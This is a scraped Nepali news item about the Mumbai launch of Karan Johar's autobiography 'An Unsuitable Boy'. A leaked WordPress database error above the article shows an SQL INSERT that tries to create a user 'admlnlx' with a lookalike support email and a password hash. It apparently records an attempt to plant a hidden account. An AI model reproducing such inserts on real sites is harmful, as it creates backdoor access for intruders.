WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B6FVF4TehY3yOGbJYesEZm9wvfGcyW0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-14 07:45:50', '', 'admlnlx', 'admlnlx')
भारत,माघ ४ –
भारतका चर्चित फिल्ममेकर तथा निर्देशक करन जोहरको आत्मकथा सार्वजनिक भएको छ ।
दि टाइम्स अफ इन्डियाका अनुसार उनको जीवनको बाल्यकालदेखि फिल्म उद्योगमा प्रवेश गरेपछिको घटना विवरणलाई सो किताबमा समावेश गरिएको छ । किताबको नाम ‘एन अनस्विटेबल ब्वाइ’ छ ।
भारतको मुम्बईमा आयोजित एक कार्यक्रमका बीच बलिउड सुपरस्टार शाहरुख खानले पुस्तक अनावरण गरेका थिए । कार्यक्रममा अभिनेत्री आलिया भट्ट, नायक सिद्धार्थ मलहोत्रालगायत उपस्थित थिए । यो किताब पेन्गुइन बुक्स इन्डियाले प्रकाशन गरेको हो ।